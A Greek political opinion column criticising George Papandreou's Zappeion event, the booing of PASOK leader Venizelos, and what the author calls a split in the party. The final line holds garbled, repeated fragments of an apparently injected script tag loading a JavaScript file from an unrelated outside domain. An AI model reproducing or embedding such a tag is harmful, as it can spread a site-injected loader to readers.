Εκτός ελέγχου – Ο Γιώργος Παπανδρέου έκοψε οριστικά το ΠΑΣΟΚ στα δυο.

«Σαν τρελό φορτηγό με τα φρένα σπασμένα…». Οσα συνέβησαν στο Ζάππειο δείχνουν ότι ο νεοπαπανδρεισμός βρίσκεται εκτός ελέγχου. Εκτός από την επαφή με την πραγματικότητα έχασε και κάθε σχέση με την ευπρέπεια: κάλεσαν κάποιον να μιλήσει στην εκδήλωσή τους και στην συνέχεια τον γιουχάρισαν.

Γράφει ο ΑΝΔΡΕΑΣ ΔΕΛΗΓΙΑΝΝΗΣ

Κάλεσαν κάποιον να μιλήσει στην εκδήλωση τους και στην συνέχεια τον γιουχάρισαν

Ούτε ο οικοδεσπότης, τα μέλη της οικογένειας Παπανδρέου, ούτε ο οργανωτής Πετσάλνικος είχαν την ευπρέπεια να κάνουν έστω μια παρατήρηση στην κλάκα που αποδοκίμαζε τον πρόεδρο του ΠΑΣΟΚ Βαγγέλη Βενιζέλο. Τόσος σεβασμός στο ρόλο του, στην πολιτική, στην ιδία τους την εκδήλωση.

Από μια άποψη αυτοπροβοκαρίσθηκαν: τα επεισόδια απέσπασαν την προσοχή, από όσα είπε ο Γ. Παπανδρέου-αν και δεν είπε και τίποτε σπουδαίο. Οσο για τον Βενιζέλο όφειλε να γνωρίζει τι παθαίνει όποιος ανακατεύεται με τα πίτουρα….

Από μόνη της η εκδήλωση του Ιδρύματος Ανδρέα Παπανδρέου, για τον ιδρυτή του ΠΑΣΟΚ, ήταν προσβολή στη μνήμη του. Οχι μόνο για τα έκτροπα που οργανώθηκαν εναντίον αρχηγού κόμματος, του δικού του. Αλλά και γιατί ήταν μια παράσταση διχασμού του ΠΑΣΟΚ – αυτού που απέμεινε τέλος πάντως.

Ο Ανδρέας έμεινε στην ιστορία γιατί ένωσε τις δυνάμεις της δημοκρατικής παράταξης και δεν βγήκε από το ιδεολογικό της πλαίσιο ποτέ. Ο γιός του υπερέβη κάθε πολιτικό και ιδεολογικό φραγμό και άνοιξε την πόρτα στο ΔΝΤ και ταυτόχρονα προσπάθησε να κυβερνήσει με τους κηπουρούς, στους όποιους μοίρασε τα κυβερνητικά αξιώματα – χωρίς να έχουν καμία σχέση με το ΠΑΣΟΚ.

Εν τέλει ήταν μια εκδήλωση για την οποία κανείς δεν μπορεί να είναι υπερήφανος. Και όσοι παρέστησαν πρέπει να το ξανασκεφτούν. Γιατί με την παρουσία τους έριξαν νερό στον ρεβανσισμό μιας οικογένειας.

Είναι προφανές ότι με την εκδήλωση του Ζαππείου ο Γιώργος Παπανδρέου έκοψε οριστικά το ΠΑΣΟΚ στα δυο. Στο εξής θα ακολουθεί τις προτροπές μια ομάδας αυλοκολάκων που, για να έχουν οι ίδιοι ρόλο τον παροτρύνουν να δαγκώσει περισσότερο από όσο μπορεί να μασήσει. Πρόβλημά του. Ο καθένας διαλέγει το τέλος του στην πολιτική – ενίοτε το διαλέγει και δυο φορές.

Είναι προφανές ότι το ΠΑΣΟΚ θα τον βρίσκει συνεχώς μπροστά του. Οχι για καλό. Δικαίωμά του. Το ερώτημα είναι τι κάνουν οι υπόλοιποι.

ΥΓ. Οσο για τον Βενιζέλο, αυτά θα παθαίνει όσο κρατάει στο συρτάρι του τα πορίσματα από τον οικονομικό έλεγχο της περιόδου 2004-12 στο κόμμα. challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >